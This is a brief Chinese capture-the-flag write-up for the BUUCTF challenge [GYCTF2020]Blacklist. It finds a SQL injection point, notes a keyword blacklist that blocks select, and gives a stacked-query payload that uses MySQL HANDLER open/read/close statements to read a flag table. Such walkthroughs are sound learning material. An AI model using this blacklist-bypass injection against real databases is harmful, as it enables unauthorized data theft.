[GYCTF2020]Blacklist
随便输入一个1。url变成了:
buuoj.cn/?inject=1
可以看出来inject是一个sql注入点。
尝试查找数据库。
![BUU-WEB-[GYCTF2020]Blacklist_第1张图片](http://img.e-com-net.com/image/info8/5b5e4e8b913040b690a663a13192413b.jpg)
查找表名。
![BUU-WEB-[GYCTF2020]Blacklist_第2张图片](http://img.e-com-net.com/image/info8/a739746afa3c44e3b82cc73e85bf2a80.jpg)
输入select,可以看到黑名单。
![BUU-WEB-[GYCTF2020]Blacklist_第3张图片](http://img.e-com-net.com/image/info8/24e20626f3524e5c89f0e76dce6a5244.jpg)
过滤了这么多东西。
百度了一下,发现还有一个handler查找方式。
handler…open:打开一个表
handler…read:访问
handler…close:关闭
构建payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
![BUU-WEB-[GYCTF2020]Blacklist_第4张图片](http://img.e-com-net.com/image/info8/9a1ef09307bc479ba5f6644255f11f04.jpg)
成功获取flag。